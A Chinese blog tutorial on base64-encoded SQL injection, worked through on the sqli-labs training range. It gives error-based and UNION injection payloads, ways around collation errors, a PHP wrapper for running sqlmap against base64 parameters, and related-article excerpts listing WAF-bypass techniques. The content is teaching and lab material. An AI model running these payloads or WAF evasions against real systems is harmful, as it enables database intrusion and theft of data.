SQL注入之BASE64变形注入

最新推荐文章于 2024-12-20 09:26:47 发布
原创 最新推荐文章于 2024-12-20 09:26:47 发布 · 3.2k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SQL注入 #base64 #变形注入 #绕过 #测试脚本

注入简介

什么是base64注入?

base64注入是针对传递的参数被base64加密后的注入点进行注入。除了数据被加密意外,其中注入方式与常规注入一般无二

编码工具选择

在线工具:http://tool.oschina.net/encrypt?type=3

也可以使用burp中自带的编码模块(decoder)

如何发现此漏洞?

在互联网系统中,目前遇到两种base64加密传参方式

第一种,例如id=1,把id=1全部加密处理,得到aWQ9MQ==,直接搜索inurl:?aWQ0

第二种,只处理传参值,得到id=MQ==,搜索inurl:?id=M*=

注入实现

靶场选择

此处继续选用sqlilabs作为测试靶场,第21关,是关于cookie的base64变形注入

漏洞复现

打开靶场所在url,是一个登录界面输入用户名密码,admin/666666,登陆成功,界面如下图

从上图可以看到,系统返回了我们的cookie值,并且进行了编码,这里我们可以使用抓包修改cookie,经过解码,YWRtaW4 =的值是admin,对admin'进行编码,观察页面变化,如下图

尝试闭合原语句,payload:admin')#,如下图

由于这里发生mysql报错,直接尝试报错注入,payload:admin') and updatexml(1,concat(0x7e,database()),1)#,如下图

知识扩展

再继续测试的过程中可能会遇到,提示:Error: Illegal mix of collations for operation 'UNION',这种错误的成因是因为编码的缘故,字符集的编码不同所导致的,要解决就配合convart、using latin1函数来解决。

CONVERT() 函数是把日期转换为新数据类型的通用函数。

大致poyload如下

UNION SELECT 1,2,3,4,5,6,7,convert(Table_Name using latin1) from information_schema.tables Where table_Schema=database()--+

参考文章:https://www.2cto.com/article/201202/121073.html

There are 3 ways to bypass this error:
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
 
Other ways (Thanks to benzi):
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary)

自动化工具

sqlmap

原则上,只要抓包加上–tamper base64encode扩展模块就可以了,未实验

第二个姿势,针对get型,可以尝试写一个demo

命名为test.php,如下

<?php 
$id = base64_encode("id=".$_GET['id']);
echo file_get_contents("http://www.xxxx.com/xxx.php?{$id}");
?>

注意:xxx.php是原网站页面,结下了sqlmap语句可以直接写成

sqlmap-u "http://127.0.0.1/test.php?id=12" -v3

参考文章:https://www.cnblogs.com/xishaonian/p/6370354.html

暂时这些吧

25-1 SQL 注入攻击 - cookie base64编码注入
weixin_43263566的博客
03-03 363
原理Base64编码的原理是将三个字节的二进制数据(共24位)转换成四个ASCII字符。由于每个ASCII字符可以表示64种状态(2^6),刚好可以用来表示24位二进制数据。这种编码方式通过将二进制数据划分为每组6位,然后将这6位的值转换为对应的Base64字符,从而实现编码过程。字符集大写英文字母:A-Z小写英文字母:a-z数字:0-9两个额外的符号,在不同的系统中可能有所不同,通常是和此外,为了使编码的结果能够被整除为4,Base64编码可能会在最后使用字符进行填充。编码表索引字符。
WAF 规则绕过绕过终极指南:从 SQL 注入到高级编码技术(3.21 更新)
浩策盾悟
01-27 1万+
测试最新版本的WAF可以完美绕过。这个需要mysql版本大于5.00.00。/*|%23--%23|*/ 注释符号 *|%23--%23|* 干扰符号。在mysql中这个不是注释,而是取消注释的内容。这个方法也可以部分绕过最新版本的WAF。/包含关键词进行绕过。用一些特殊字符代替空格,特殊字符拼接绕过waf。Mysql 内置得方法。Waf触发规则的绕过
SQL注入-11】base64注入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 3242
目录1 base64注入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64注入2 base64注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 尝试使用union查询2.2.4 获取库名表名字段名字段内容 1 base64注入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base
Base64变形注入
kuxing100的专栏
03-19 2698
什么是注入?估计有点基础的人都会反问,你傻逼吧,问这么傻逼的问题,把自己的SQL语句插入到原程序中,操作数据库。 你的注入熟吗?常在论坛逛的人都会反问,你傻逼吧,问这么傻逼的问题,论坛这么多关于注入的文章,怎么可能不会,工具注手注无所不会。 那么你知道Base64变异注入吗?这下轮到你傻逼了吧?不知道,而且工具也没这么个功能,或者说,闻所未闻。如果你感觉对SQL手工注入已经很熟了,看看这篇文章
【网络安全】SQL注入--base64注入
边缘拼命划水的小陈
04-07 615
当用户名存入cookie中并且会直接拼接到sql语句中时,可能会存在此漏洞。burpsuite抓取登录信息,为base64编码信息。》两次结果不同故存在sql注入。》经过尝试,字段数目为3。判断编码信息为用户名。
SQL 注入漏洞(十三)base64注入
不秃头的程序Yang
06-21 1781
二、代码分析 2、查询敏感信息
sql注入靶场通关
xiaoyang0475的博客
07-03 1441
打开小皮,并打开Apache2.4.39 和 MySQL5.7.26打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。打开创建好的网站打开网站就可以进行sqli-labs靶场通关啦接下来让我们开始进行打靶吧!输入正常数据查看回显通过判断是否存在注入点和注入类型来进行打靶判断注入点?id=1查看是否存在注入点确定存在注入点将后面进行注释查看页面回显页面回显正常判断注入方式为字符型注入
sql注入面试题
m0_52484587的博客
07-08 971
宽字节注入主要利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字,当php中addslash和magic_quotes_gpc开启时,会对单引号(0x27)进行转义,形成’的形式,\的16进制编码是0x5c,当使用GBK编码时,0x5c前如果出现类似0xdf之类的字符,就会结合形成一个汉字,结果就是0xdf5c27,而0xdf5c会结合成一个汉字,后面的引号(27)自然就再次生效(转义失效,被df吃掉了),这就是宽字节注入的原理。\6. 规范编码,字符集。
CTF---Web---SQL注入---09---注入列+sql语句变形
qq_22160557的博客
07-31 525
文章目录前言一、题目描述二、解题步骤1、sql语句变形2、猜测列数3、注入列的选择4、爆表、列、字段三、总结 前言 题目分类: CTF—Web—SQL注入—09—注入列+sql语句变形 一、题目描述 题目:SQL注入 二、解题步骤 1、sql语句变形 Step1: TVE9PQ==是base64编码, 经两次解码后, 答案为数字1. 提示此次手工注入需输入的数据需经过两次base64编码的代码. 2、猜测列数 Step2: 尝试手工注入时, -1 union select 1,2#, 当尝试1,2,3
B站小迪安全笔记第十八天-SQL注入堆叠及waf绕过注入
m0_61530426的博客
07-29 690
B站小迪安全笔记
Sql Server Base64加密解密角本
12-25
非常实用的Base64加密,解密角本。基于UTF8,支持中文加解密。
[Base64变形算法] RandomBase64 v1.0
01-09
功能介绍: 支持标准算法中加密表随机化; 支持从0x21~0x7E可见字符随机化; 支持随机化字符串排除列表; 支持自定义加密表; 可计算变形的小尾排序的Base64算法;
使用 T-SQL 实现 base64 解码
数据库天地
02-19 200
IF OBJECT_ID(N'dbo.f_base64_decode') IS NOT NULL DROP FUNCTION dbo.f_base64_decode; GO /*-- == base64 解码================================= 在SQL Server 中,使用FOR XML 生成xml 实例时,binary 数据 使用base64 ...
《WEB安全渗透测试》(9)SQL注入实战:base64注入
午夜安全
10-24 4321
《WEB安全渗透测试》(9)SQL注入实战:base64注入 base64注入是针对传递的参数被base64加密后的注入点进行注入。这种方式常用来绕过一些WAF的检测。1)判断是否存在注入使用Burp的Decoder模块对参数进行base64编码,如下所示:id=1,id=1’,id=1 and 1=1,id=1 and 1=2编码后:id=MQ==,id=MSc=,id=MSBhbmQgMT0x,id=MSBhbmQgMT0y访问的结果如下,说明存在SQL注入漏洞。2)查询字段数量判断出字段数量是:...
Web安全原理剖析(十)——Base64注入攻击
热门推荐
Phantom03167的博客
10-01 1万+
Base64注入攻击
Sqlmap注入Base64编码的注入
weixin_30412013的博客
06-20 888
不小心删了,找快照才找到的。补回来。。。 上次遇到一个Base64注入点,手工注入太麻烦,于是在网上看了一下sqlmap Base64注入的方法,如下: sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs sqlmap拥有很多功能强力的插件,插件的使用方法: -...
SQL注入11】base64注入基础及实践(基于BurpSuite工具的Sqli-labs-less22靶机平台)
Fighting_hawk的博客
02-21 3732
1. base64注入是参数被base64编码过的注入方式;其注入注入手法与之前所学相同。 2. 掌握base64注入的方法。
SQL注入base64注入攻击
coderge's 优快云 Blog.
09-19 3356
1 base64注入代码分析 在base64注入页面中,程序获取GET参数ID,利用base64_decode ()对参数ID进行base64解码,然后直接将解码后的$id拼接到select语句中进行查询,通过while循环将查询结果输出到页面,代码如下所示。 <?php header("Content-Type:text/html;charset=utf8"); $con=mysqli_connect("localhost","root","qwer","security"); mysqli_
sql注入----base64注入
2402_83134109的博客
12-20 359
通过bp抓包send to Repeter,发现cookie中的uname已经被加密。注意本关点击时无反应,需把url后边的地址改对就可以或者在第二页也有22关。通过bp中的base64解码,获得账户名dumb(此处记得将%3D换成=)其余步骤同报错注入语句。(报错注入请看上一篇文章)然后再通过base64加密将dumb'加密。那么换成"继续尝试。发现此时报错,所以使用。Render发现没有变化。使用base64解码之后进行带入查询。账户密码为Dumb,Dumb,登录。
SQL注入中你是怎么绕WAF的
最新发布
05-10
<think>嗯,用户现在想知道如何绕过WAF进行SQL注入攻击。我需要整理一下相关的技术方法,确保回答准确且参考了提供的引用内容。首先,根据引用中的资料,绕过WAF的方法有很多种,比如使用注释符、特殊符号、编码解码、参数污染等。我得把这些方法分类,让结构更清晰。 用户可能对具体例子感兴趣,比如内联注释或者URL编码绕过。引用3提到用/**/替换空格,引用5里也有内联注释的例子。需要详细说明这些技术,并给出实际的payload示例,这样用户更容易理解。同时,还要注意引用的正确标注,比如在提到注释符绕过时,要加上引用[^3]或[^5]。 另外,用户可能想知道不同数据库的特性,比如MySQL的内联注释,或者如何利用参数污染。引用5提到了参数污染的方法,应该详细解释一下,并给出例子。比如使用多个参数来混淆WAF检测,这在引用5的第四种方法中有提到。 还需要考虑用户的实际应用场景,比如如何绕过特定的安全设备,比如安全狗。引用5中的例子使用了/*!42444and*/这样的内联注释,这可能针对特定版本的MySQL,需要说明版本号的作用。 此外,用户可能对如何组合多种技术感兴趣,比如同时使用注释和编码。引用4中提到特殊符号和函数分解,可能需要结合这些方法构造复杂的payload。同时,模糊测试(Fuzz)也是一个重要点,引用4和5都有提到,应该包含在回答里。 最后,要确保回答结构清晰,分点列出方法,每个方法下都有示例和对应的引用来源。这样用户能够逐步理解不同的绕过技术,并知道如何应用。需要避免技术错误,比如正确使用内联注释的语法,以及编码的正确方式,比如十六进制或URL编码。</think>### SQL注入绕过WAF的技术方法 #### 一、注释符绕过 1. **普通注释符** 通过`/**/`或`#`替换空格或干扰检测,例如: ```sql UNION/**/SELECT/**/1,2,column_name/**/FROM/**/information_schema.columns ``` 此方法可绕过对空格的检测,适用于WAF过滤`UNION SELECT`组合的情况。 2. **内联注释(MySQL特有)** 使用`/*!版本号 内容*/`语法,若版本号大于数据库版本则注释内容会被执行: ```sql ?id=1'/*!44544AND*/'1'='1 ``` 通过添加高版本号的内联注释,可绕过部分WAF对关键字的检测[^5]。 --- #### 二、特殊符号与编码 1. **十六进制编码** 将表名或字符串转换为十六进制,例如`table_name=0x61645F6C696E6B`(对应`"ad_link"`)[^1]: ```sql UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_name=0x61645F6C696E6B ``` 2. **URL编码与混淆** 使用`%0A`(换行符)或`%23`(#号)干扰检测: ```sql ?id=1%0AUNION%0ASELECT%0A1,version(),3 ``` --- #### 三、参数污染与HTTP特性 1. **参数污染(HPP)** 通过多个同名参数混淆WAF解析: ``` ?id=1&id=/*&id=*/UNION SELECT 1,2,3 ``` 部分WAF可能仅检查第一个参数,从而绕过过滤[^5]。 2. **静态资源或白名单绕过** 伪造请求为静态文件(如`/test.jpg?id=1 UNION SELECT...`)或伪装成搜索引擎爬虫(修改`User-Agent`为百度爬虫)[^4]。 --- #### 四、函数与语法变形 1. **函数替代** 用等价函数替换被过滤的关键字,例如: ```sql SELECT substring(database(),1,1) → SELECT mid(database(),1,1) ``` 2. **分步注入与子查询** 分解复杂操作为多步,例如: ```sql ?id=1 AND (SELECT 1)=(SELECT 0x41*1000) UNION SELECT... ``` 通过构造大量数据干扰WAF的正则匹配[^2]。 --- #### 五、模糊测试(Fuzz)与自动化工具 1. **Payload变异** 使用工具(如`sqlmap tamper脚本`)自动生成混合大小写、添加随机注释等变体: ```sql UnIoN/*!88888SeLeCt*/1,@@version,3 ``` 2. **数据库特性利用** 如MySQL的`/*!50000关键字*/`语法、PostgreSQL的`||`运算符等,结合版本特性构造绕过[^5]。 --- #### 防御与绕过对抗要点 - **WAF规则局限性**:WAF通常基于正则表达式匹配,无法覆盖所有语法变形[^4]。 - **流量混淆**:通过多次编码(如双重URL编码+Base64)或分块传输(Chunked Encoding)绕过深度检测。 - **动态检测**:结合时间盲注或布尔盲注,减少直接回显的依赖。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值